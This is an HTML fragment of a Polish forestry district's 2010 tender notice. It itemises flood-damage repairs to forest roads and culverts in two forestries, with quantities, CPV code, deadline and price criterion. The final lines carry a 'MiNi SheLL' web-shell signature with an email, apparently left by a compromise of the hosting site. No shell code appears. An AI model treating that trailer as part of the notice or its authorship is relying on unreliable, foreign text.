v) uporządkowanie i wyprofilowanie poboczy mechanicznie - 138,0m2,
w) ustawienie poręczy stalowych na słupkach żelbetowych (z odzysku) - długość przęseł 6m - 24,0m,
x) oczyszczenie i pomalowanie istniejących poręczy stalowych (dwustronnie) - 120,0m,
y) ubezpieczenie rozmytego koryta potoku narzutem kamiennym z gruzu kamienno-betonowego z rozbiórki ścianek czołowych - 5,5m3,
z) przekopanie koryta potoku (odcinki zamulone) na łącznej długości 20m, koparką - 20,0m3.
Szczegółowe wymagania dotyczące techniki prac, kontroli jakości robót, odbioru robót zawarte są w załączonych:
- szczegółowych specyfikacjach technicznych,
- projekcie technicznym,
- wzorze umowy.
Zamawiający wymaga 36 miesięcznej gwarancji na wykonanie przedmiotu zamówienia.
Termin wykonania prac - 29.10.2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USUWANIE SZKÓD POWSTAŁYCH W WYNIKU DZIAŁANIA WÓD POWODZIOWYCH NA TERENIE LEŚNICTWA DZIKÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usuwanie szkód powstałych w wyniku działania wód powodziowych na terenie Leśnictwa Dzików obejmujące: 
I. Remont odcinka drogi leśnej nr 5 w oddziale 27 w Nadleśnictwie Oleszyce:
a) uzupełnienie ubytków w nasypie nad ściankami czołowymi i stożków istniejącego przepustu O150cm, gruntem dowiezionym - 4,0m3,
b) zdjęcie humusu koparką grub. 15cm ze złożeniem urobku poza strefę robót - 175,0m2,
c) wykonanie wykopu koparką podsiębierną 0,60m3 w gr. kat. II, głęb. 2,0m, szer. dołem 3,2m, szer. górą 7,2m, ze złożeniem urobku na koronie drogi, z dodatkowym przerzutem koparką - 39,0m3,
d) wykonanie wykopu pod fundament ręcznie, z przerzutem koparką w gr. kat.II - 5,4m3,
e) wykonanie fundamentu pod rurę z kruszywa kamiennego z odzysku, z przewozem taczkami do 10m, z rozścieleniem i zagęszczeniem - 3,6m3,
f)  wykonanie podsypki z piasku grub. 5-15cm w stanie luźnym, z podaniem koparką -13,5m2,
g) ułożenie rurociągu z rury stalowej, spiralnie karbowanej typu HelCor PA
lub równoważnego, na podsypce z piasku, przy pomocy koparki lub dźwigu z połączeniem dwóch odcinków złączką, z dodatkowym 2-krotnym przełożeniem rury koparką ze składu - 9,0m +1,0kpl,
h) wykonanie podsypki wspierającej w pachwinach rurociągu miejscowym piaskiem z ubiciem ubijakami ręcznymi - 1,8m3,
i) wykonanie zasypki rurociągu piaskiem z wykopu: podanie piasku koparką, rozścielenie warstwami do 30cm i zagęszczenie ręcznie,; zasypkę wykonać symetrycznie z obu stron rurociągu -  41,0m3,
j) wykonanie nasypu z gruntu pozyskanego z wykopu z zagęszczeniem - 15,0m3,
k) ubezpieczenie skarp wlotu i wylotu przepustu oraz koryta potoku brukiem kamiennym grub. 16-20cm, na podsypce cem.-piaskowej grub. 10cm, z zalaniem spoin zaprawą - 43,0m2,
l) wykonanie podbudowy z tłucznia niesortowanego 0-60mm grub. 20cm, z wykonaniem koryta, rozścieleniem i zagęszczeniem ręcznie - 57,0m2,
m) wykonanie warstwy wyrównawczej z tłucznia sortowanego 20-40mm, śr. grub. 7cm, zamkniętej klińcem - 306,0m2,
n) wykonanie nawierzchni bitumicznej z masy asfaltowo-mineralnej grysowo-żwirowej, grub. 5cm - 270,0m2,
o) wykonanie utwardzenia poboczy - 45,0m2,
p) uporządkowanie i wyprofilowanie poboczy mechanicznie - 135,0m2,
q) wykonanie rowu koparką w gr. kat.III z odłożeniem urobku obok i wyprofilowaniem - 70,0m3.

II. Remont uszkodzonego przepustu i drogi w oddz. 61 Nadleśnictwa Oleszyce:
1. Przepust O100 długości 6,0m:
a) rozebranie istniejących ścianek czołowych przepustu z betonu ze złożeniem gruzu obok 
z odkopaniem ręcznym - 3,8m3,
b) wykonanie nowych ścianek czołowych z betonu kl.B-30 z wykonaniem fundamentu, ustawieniem i rozebraniem deskowania, z ułożeniem mieszanki, zagęszczeniem 
i pielęgnacją, izolacja ścian lepikiem i zabudową nasypem, z pompowaniem wody - 4,0m3.
2.  Roboty drogowe:
a) usuniecie humusu z korony drogi z odrzuceniem urobku poza koronę drogi - 35,0m3,
b) uzupełnienie wymytych nasypów na skarpach i poboczach ziemią dowiezioną samochodami z odległości 2km z ręcznym uformowaniem i zagęszczeniem - 17,0m3,
c) oczyszczenie nawierzchni z namułów i zanieczyszczeń naniesionych przez wodę - 240,0m3,
d) wyrównanie rozmyć i ubytków w konstrukcji nawierzchni 0-63mm na długości 70m przy średniej grubości 15cm z  mechanicznym rozścieleniem i zagęszczeniem - 39,0m3,
e) wykonacie na długości 70m warstwy wyrównawczej z tłucznia 20-40mm średniej grubości 7cm i szerokości 3,50m z ukształtowaniem  jednostronnego spadku poprzecznego 2% 
i zaklinowaniem klińcem - 17,0m3,
f) wykonanie nawierzchni z masy bitumicznej grysowo żwirowej grubości 5cm i szerokości 3,0m - 210,0m3,
g) uzupełnienie poboczy gruntem dowiezionym z dokopu (miejsce poboru ziemi wskaże zamawiający) z ręcznym uformowaniem i zagęszczeniem - 23,0m3,
h) utwardzenie poboczy mieszanką kamienną 0-31,5mm, grubość 5cm z rozścieleniem 
i zagęszczeniem ręcznym - 7,0m3,
i) ubezpieczenie krawędzi skarp pasami darniny szerokości 30cm z przybiciem kołkami z pozyskaniem i transportem na odległość do 1km z obsianiem miejsc pozyskania darniny - 42,0m3,
j) rozebranie i ponowne ustawienie poręczy drogowych żelbetowych typ zakopiański 
- 27,0m3,
k) czyszczenie rowów z namułów śr. głęb. 30cm koparką, z odłożeniem urobku obok i rozplantowanie - 29,0m3.

III. Usuwanie szkód powodziowych na przepuście drogi nr 16 Nadleśnictwa Oleszyce
a) rozebranie ażurowych płyt betonowych ze złożeniem na koronie drogi - 11,0m2,
b) uzupełnienie skarp gruntem przepuszczalnym dowiezionym samochodami na odl. do 0,5km z ręcznym uformowaniem skarp i zagęszczeniem oraz zestopniowaniem podłoża - 2,0m3,
c) ułożenie uprzednio zdjętych płyt ażurowych na wyprofilowanych skarpach na podsypce cem.- piaskowej - 11,0m2,
d) wypełnienie otworów w płytach mieszanką betonową - 0,55m3,
e) ubezpieczenie krawędzi skarp pasami darniny szer. 50cm z przybiciem kołkami  z pozyskaniem kołkami z pozyskaniem i transportem na odległość do 0,5km - 50,0m2,
f) wykonanie ścieku z korytek betonowych na skarpie drogi - 6,0mb.


IV. Remont korpusu drogi uszkodzonego przez powódź w oddz. 63 Nadleśnictwa Oleszyce
1. Przepust:
a) wykonanie przepustu z rurociągu Pecor Optima lub równoważnego O100 dł. 6m z wykonaniem wykopu, podsypki pod rurociąg grubości 15cm , ułożenie rurociągu, zasypanie rurociągu z zagęszczeniem:
- rurociąg - 6,0m3
- montaż - 6,0mb
b) ubezpieczenie skarp płytami żelbet. drogowymi pełnymi - 22,5m2.
2. Roboty drogowe
a) usunięcie humusu z korony drogi koparką z odrzuceniem urobku poza koronę drogi - 45,0m3,
b) uzupełnienie wymytych nasypów  na skarpach i poboczach ziemią dowiezioną samochodami z dokopu z odl. 2km z ręcznym uformowaniem i zagęszczeniem  - 12,0m3,
c) oczyszczanie nawierzchni z namułów i zanieczyszczeń naniesionych przez wodę - 320,0m3,
d) wyrównanie rozmyć i ubytków w konstrukcji nawierzchni tłuczniem 0-63mm  na dł. 70m przy średniej grubości 20cm z mechanicznym rozścieleniem i zagęszczeniem  - 67,0m3,
e) wykonanie na długości 90m warstwy wyrównawczej z tłucznia 20-40mm, śr. grub. 7cm i szerokość 3,50m z ukształtowaniem jednostronnego spadku poprzecznego 2% i zaklinowaniem klińcem - 22,0m3,
f) wykonanie nawierzchni z masy bitumicznej grysowo - żwirowej grub. 5cm i szer. 3,0m - 270,0m2,
g) uzupełnienie poboczy gruntem dowiezionym z dokopu (miejsce poboru wskaże zamawiający) z ręcznym uformowaniem i zagęszczeniem - 34,0m3,
h) utwardzenie poboczy mieszanką kamienną 0-31,5mm grub. 5cm z rozścieleniem i zagęszczeniem ręcznym - 8,1m3,
i) ubezpieczenie krawędzi skarp pasami darniny szer. 30cm z przybiciem kołkami  z pozyskaniem i transportem na odległość do 1km z obsianiem miejsc pozyskania darniny - 54,0m2,
j) oczyszczenie rowów z namułów  śr. głęb. 30cm koparką, z odłożeniem urobku obok  i rozplantowaniem - 38,0m3.
Szczegółowe wymagania dotyczące techniki prac, kontroli jakości robót, odbioru robót zawarte są w załączonych:
- szczegółowych specyfikacjach technicznych,
- projekcie technicznym,
- wzorze umowy.
Zamawiający wymaga 36 miesięcznej gwarancji na wykonanie przedmiotu zamówienia.
Termin wykonania prac - 29.10.2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> USUWANIE SZKÓD POWSTAŁYCH W WYNIKU DZIAŁANIA WÓD POWODZIOWYCH NA TERENIE LEŚNICTWA FUTORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usuwanie szkód powstałych w wyniku działania wód powodziowych na  terenie Leśnictwa Futory obejmujące: 

I. Remont drogi nr 2 - wymiana przepustu (oddz. 96/97):
a) ułożenie przepustów rurowych pod szlakiem w wskazanym miejscu - 6mb, rura O50cm PEHD Pecor Optima lub równoważna - 8,0mb,
b) wykonanie warstwy odsączającej z piasku w wskazanych miejscach  szlaku - 60,0m3 ,
c) wykonanie warstwy z mieszanki tłuczniowej w wskazanych miejscach - 60,0 t .

II. Remont zniszczonego przepustu O60 w oddz. 92 Nadleśnictwa Oleszyce:
a) rozebranie istniejącego przepustu O60 z betonu ze złożeniem urobku obok - 6m3,
b) ułożenie nowego rurociągu O60 z rur Peror Optima lub równoważnego dł.6m z wykonaniem wykopu, ułożeniem podsypki z piasku gr. 10cm w stanie luźnym, ułożenie rury, wykonanie zasypki z gruntu dowiezionego z ukopu z odległości 2km samochodem, ułożenie i zagęszczenie ręczne 
- rurociąg - 6m3
- montaż - 6mb,	
c) wykonanie ścianek czołowych z betonu kl. B30, z wykonaniem wykopu i fundamentu  z ustawieniem i rozebraniem deskowania, ułożeniem mieszanki, zagęszczeniem i pielęgnacją betonu, izolacja ścian lepikiem i zabudową nasypem - 2m3,
d) wykonanie przebudowy i nawierzchni z tłucznia 20-40mm grub. 25cm z zamknięciem klińcem i miałem ręcznie z ręcznym zagęszczeniem - 2,60m3,
e) oczyszczenie z namułów rowu odpływowego o śr. głębokości 20cm w gr. Kat IV (przerośnięty korzeniami) dług. 50m - 7,5m3.
Szczegółowe wymagania dotyczące techniki prac, kontroli jakości robót, odbioru robót zawarte są w załączonych:
- szczegółowych specyfikacjach technicznych,
- projekcie technicznym,
- wzorze umowy.
Zamawiający wymaga 36 miesięcznej gwarancji na wykonanie przedmiotu zamówienia.
Termin wykonania prac - 29.10.2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com